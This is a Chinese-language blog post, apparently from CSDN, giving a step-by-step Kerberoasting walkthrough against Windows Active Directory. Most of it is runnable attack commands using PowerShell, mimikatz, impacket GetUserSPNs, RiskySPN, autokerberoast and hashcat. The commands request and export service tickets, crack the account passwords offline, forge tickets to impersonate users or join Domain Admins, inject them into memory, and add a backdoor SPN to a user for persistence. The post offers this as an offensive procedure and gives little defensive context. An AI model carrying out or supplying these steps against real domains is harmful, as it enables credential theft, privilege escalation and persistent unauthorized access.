域渗透-Kerberoasting Attack

最新推荐文章于 2024-04-14 15:42:58 发布
最新推荐文章于 2024-04-14 15:42:58 发布
阅读量557 收藏
点赞数
分类专栏: 内网蠕动 权限维持
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43645782/article/details/117357143
版权

域渗透-Kerberoasting Attack

一、概述

黑客可以使用有效的域用户的身份验证票证(TGT)去请求运行在服务器上的一个或多个目标服务的服务票证。DC在活动目录中查找SPN,并使用与SPN关联的服务帐户加密票证,以便服务能够验证用户是否可以访问。请求的Kerberos服务票证的加密类型是RC4_HMAC_MD5,这意味着服务帐户的NTLM密码哈希用于加密服务票证。黑客将收到的TGS票据离线进行破解,即可得到目标服务帐号的HASH,这个称之为Kerberoast攻击。如果我们有一个为域用户帐户注册的任意SPN,那么该用户帐户的明文密码的NTLM哈希值就将用于创建服务票证。这就是Kerberoasting攻击的关键。

二、Kerberoasting攻击流程

  1. 发现服务主体名称(SPN)
  2. 请求服务票据
  3. 导出服务票据
  4. 破解服务票据
  5. 重写服务票据&RAM注入

三、请求服务票据

Powershell

查看.net版本
具体可以参考

https://docs.microsoft.com/zh-cn/dotnet/framework/migration-guide/how-to-determine-which-versions-are-installed

reg query "HKLM\Software\Microsoft\.NETFramework"
reg query "HKLM\Software\Microsoft\NET Framework Setup\NDP"

测试 .net 2.0无法使用

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList "mssqlsvc/comp.test.com:1433"

在这里插入图片描述
批量请求所有SPN

Add-Type -AssemblyName System.IdentityModel  
setspn.exe -q */* | Select-String '^CN' -Context 0,1 | % { New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList $_.Context.PostContext[0].Trim() }

mimikatz

mimikatz.exe "kerberos::ask /target:mssqlsvc/comp.test.com:1433" "exit"

在这里插入图片描述

GetUserSPNs

https://github.com/SecureAuthCorp/impacket

该工具支持提供域用户凭证从非域成员机器请求票据

python3 GetUserSPNs.py -request test.com/song -dc-ip 192.168.164.130

在这里插入图片描述

查看票据是否申请成功

klist

在这里插入图片描述

Mimikatz

mimikatz.exe "kerberos::list" "exit"

在这里插入图片描述

MSF

load kiwi
kerberos_ticket_list
kiwi_cmd kerberos::list

RiskySPN

https://github.com/cyberark/RiskySPN

powershell -ExecutionPolicy Bypass
Import-Module .\Find-PotentiallyCrackableAccounts.ps1
Find-PotentiallyCrackableAccounts -FullData -Verbose

在这里插入图片描述

Find-PotentiallyCrackableAccounts -Domain "test.com"

在这里插入图片描述

Import-Module .\Export-PotentiallyCrackableAccounts.ps1
Export-PotentiallyCrackableAccounts

在这里插入图片描述
PS:选择Kerberos服务票证是弱密码的,容易破解,可以通过下列因素来确定:
(1)SPNs绑定到域用户账户
(2)最后一次密码设置(Password last set)
(3)密码过期时间
(4)最后一次登录(Last logon)
(5)加密方式(TGT支持AES256,AES128,RC4-HMAC和3DES等加密方式,其中RC4_HMAC_MD5可破解)

导出票据

mimikatz

mimikatz.exe "standard::base64" "kerberos::list /export" "exit"

在这里插入图片描述

kerberoast

https://github.com/xan7r/kerberoast

Import-Module .\autokerberoast_noMimikatz.ps1
Invoke-AutoKerberoast
Invoke-AutoKerberoast -GroupName "Domain Admins"
Invoke-AutoKerberoast -Domain dev.testlab.local
Invoke-AutoKerberoast -SPN MSSQLSvc/sqlBox.testlab.local:1433
Invoke-AutoKerberoast -DomainController 172.20.200.100

在这里插入图片描述

Get-TGSCipher

https://github.com/cyberark/RiskySPN

Import-Module .\Get-TGSCipher.ps1
Get-TGSCipher -SPN "mssqlsvc/comp.test.com:1433" -Format Hashcat

测试报错

破解票据

tgsrepcrack.py
tgscrack

https://github.com/leechristensen/tgscrack

有好几种方法 这里使用kali自带的hashcat

hashcat -m 13100 hash.txt passwd.txt -o found.txt --force

在这里插入图片描述

重写服务票据&RAM注入

mimikatz.exe "kerberos::ptt PENTESTLAB.kirbi" "exit"
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -u 500
python kerberoast.py -p Password123 -r PENTESTLAB_001.kirbi -w PENTESTLAB.kirbi -g 512

Kerberos票据使用密码的NTLM哈希签名。如果票据散列已被破解,那么可以使用Kerberoast python脚本重写票据。这将允许在服务将被访问时模拟任何域用户或伪造账户。此外,提权也是可能的,因为用户可以被添加到诸如域管理员的高权限组中。

后门利用

在获取SPN的修改权限后,可以为指定的域用户添加一个SPN,这样可以随时获得该域用户的TGS,经过破解后获得明文口令。例如为域用户song添加SPN VNC/comp.test.com,参数如下:

setspn.exe -U -A VNC/comp.test.com song

参考文章

Kerberoasting-Attack
https://www.freebuf.com/articles/system/174967.html

whojoe
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
内网渗透-渗透
qq_44806973的博客
11-23 4478
内网渗透(渗透) 基础指南
内网渗透渗透
m0_57307920的博客
11-05 1076
当母公司的账户想要登录到子公司的中时,子公司的由于信任母公司的,所以子公司的会听从母公司的控制器的返回的access key。在一个中,可能存在多个控,这些控不分主控制器与备份控制器,每个控制器充当的是一样的角色,比如你有三个控制器,你可以在任何一个控制器上对用户的权限进行修改,你的修改将被复制到其他两个控制器中,这样,如果一个控制器发生了故障,只要其他的控还能正常工作,整个还是可以正常运行。如,对应的服务类型叫什么,机器名是什么,服务端口号是多少等等。
渗透-Kerberoasting服务票据爆破
good good study
03-28 2719
Kerberoast攻击,就是攻击者为了获取目标服务的访问权限,而设法破解Kerberos服务票据并重写它们的过程。这是红队当中非常常见的一种攻击手法,因为它不需要与服务目标服务进行任何交互,并且可以使用合法的活动目录访问来请求和导出可以离线破解的服务票据,以获取到最终的明文密码。之所以出现这种情况,是因为服务票据使用服务帐户的散列(NTLM)进行加密,所以任何用户都可以从服务转储散列,而无需将shell引入运行该服务的系统中。
渗透详解
qq_54037445的博客
10-10 3253
渗透完整步骤,内网渗透后续msf信息扫描,msf模块
内网渗透-环境的搭建
最新发布
lza20001103的博客
04-14 1075
内网渗透-环境的搭建
内网渗透-完整的渗透
热门推荐
Love&Share
11-28 1万+
文章目录环境概念创建创建组&用户加入渗透常规信息收集内网信息收集拿下20031.MySQL弱口令2.哈希传递攻击拿下控信息收集mimikatz后渗透&其他MSF其他模块推荐阅读: 环境 在开始渗透之前,先来简单了解下的一些概念 概念 (Domain)是一个有安全边界的计算机集合(安全边界的意思是,在两个中,一个中的用户无法访问另一个中的资源) 工作组的分散管理模式不适合大型的网络环境下工作,模式就是针对大型的网络管理需求设计的,就是共享用户账号,计算机账号和.
渗透基本技巧
weixin_30652491的博客
01-23 248
0x00 什么是 有人说是一种组织结构,是个安全边界。也有另为一个名字,"活动目录"。不管是什么,它总有一些特点,有了它,对管理一个机构的组织单元,人员,特别是计算机就方便了许多,特别是计算机,因为就是建立在计算机上的。加入里的计算机,共享文件,共享上网就会很方便。 里有个比较重要的角色,控制器(DC)。它有至高无上的权限,它可以在里对其他计算机(DA)胡作...
Distributed-dictionary-attack
05-09
Distributed-dictionary-attack是一个Java程序,它使用增量禁止系统实现易受攻击的服务器。 在该项目中,有一些通过RabbitMQ中间件进行通信的客户端。 客户端之间交换的消息是错误的密码。 你需要什么 - - -
论文研究-An Attack-Defense Trees model based on Analytic Hierarchy Process.pdf
08-14
一种基于层次分析法的攻防树模型,费禹,蒋文保,攻击树模型是分析APT攻击的一种重要理论模型,针对目前攻击树模型缺少对于防御手段的考虑及节点联结方式不合理的问题,提出一种基
Defending Against Man-In-The-Middle Attack in Repeated Games
02-07
Defending Against Man-In-The-Middle Attack in Repeated Games
Ciphertext-only attack on optical scanning cryptography
02-11
Ciphertext-only attack on optical scanning cryptography
Laser-seeding Attack in Quantum Key Distribution
02-08
Quantum key distribution (QKD) based on the laws of quantum physics allows the secure distribution of secret keys over an insecure channel. Unfortunately, imperfect implementations of QKD compromise ...
控安全之渗透
dzqxwzoe的博客
02-21 339
在通常情况下、即使拥有管理员权限,也无法读取控制器中的C:\Windwos\NTDS\ntds.dit文件(活动目录始终访问这个文件,所以文件被禁止读取)。使用Windows本地卷影拷贝服务可以获得文件的副本。在活动目录中,所有的数据都保存在ntds.dit文件中。ntds.dit是一个二进制文件,存储位置为控制器的。ntds.dit中包含(但不限于)用户名、散列值、组、GPP、OU等与活动目录相关的信息。它和SAM文件一样,是被Windows操作系统锁定的。
内网渗透:详解kerberoast攻击
A_991128a的博客
07-29 440
上篇文章介绍了kerberos的协议的认证流程以及可能出现的安全问题,也简要说了一下kerberoast攻击,本篇文章就具体介绍一下kerberoasting具体原理以及如何进行操作。关于内网相关的文章已经发了两篇了,大家感兴趣的话可以找以前的文章看一下,后面会继续出关于内网方面的知识。内网渗透:Kerberos认证协议安全性分析内网横移:抓取管理员密码首先再来回顾一下Kerberoast协议的认证过程。kerberoast认证过程算上PAC可以说有四个个阶段。如下图所示。
Kerberoasting学习
mingyqf的博客
02-24 821
Author: Shu1L Link: https://shu1l.github.io/2020/08/05/kerberosating-gong-ji-xue-xi/ 前言 Kerberoasting攻击是Tim Medin在DerbyCon 2014 上发布的一种口令攻击方法,Tim Medin同时发布了 配套的攻击工具kerberoast。此后,不少研究人员对Ker beroasting进行了改进和扩展,在GitHub上开发发布了 大量工具,使得Kerberoasting逐渐发展成为攻击的常用方法
超详细渗透过程
mkl7717的博客
05-31 236
如果目标网络够大, 就很有可能会在网络分享上找到有用的鉴别信息 (例如各种batch, vbs, .NET, ps1, etc. 文件中), 在找的过程中 "dir /s", "findstr /SI" andFind-InterestingFile 相当管用. 取决于一开始你怎么获得的权限,你可能已经用到了一些很好用的像cobalt strike类型入侵框架,或者你已经在目标网络某台机器是有了一些基本权限功能。在不同的被限制的情况下可能只有特定的办法可以成功。我们现在就可以切换成他的账号。
干货!内网渗透测试之渗透详解!收藏!
jennycisp的博客
09-04 678
将网络中多台计算机逻辑上组织到一起,进行集中管理,这种区别于工作组的逻辑环境叫做是组织与存储资源的核心管理单元,在中,至少有一台控制器,控制器中保存着整个的用户帐号和安全数据库。图1那么网络结构有什么优点呢?的优点主要有以下几个方面:1、权限管理比较集中,管理成本降低环境中,所有的网络资源,包括用户均是在控制器上维护的,便于集中管理,所有用户只要登入到,均能在内进行身份验证,管理人员可以较好的管理计算机资源,管理网络的成本大大降低;
渗透总结
01-05 176
渗透总结 写在前面 博客主页:Scorpio_m7 欢迎关注点赞收藏⭐️留言 本文由 Scorpio_m7原创,CSDN首发! 首发时间:2021年12月2日 ✉️坚持和努力一定能换来诗与远方! 作者水平很有限,如果发现错误,请留言轰炸哦!万分感谢感谢感谢! 文章目录 写在前面 渗透基础 工作组 控制器 活动目录 活动目录的结构 树和森林 森林 Windows认证协议
渗透学习笔记
qq_46804551的博客
05-04 808
初识 什么是 (domain)是windows网络中独立运行的单位,将网络中多台计算机逻辑上组织在一起,进行集中管理,这种区别于工作组的逻辑环境叫做控 在一个机器上装上活动目录以后,这个机器就会被称为控。 在windows的中,不使用主控制器与备份控制器。每个控制器充当的都是一样的角色,比如你有三个控制器,你可以在任何时候一个控制器上对用户的权限进行修改,你的修改将被复制到其他两个控制器中,同样,如果一个控制器发生故障,只要其他的控制器还能正常工作,整个还是可以正常运行
Buffer-Overflow Attack Lab
12-27
Buffer-Overflow Attack Lab是一个用于学习和实践缓冲区溢出攻击的实验。通过这个实验,你可以更好地理解缓冲区溢出攻击的原理和实现方式,并学习如何保护系统免受此类攻击。 在Buffer-Overflow Attack Lab中,你将...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值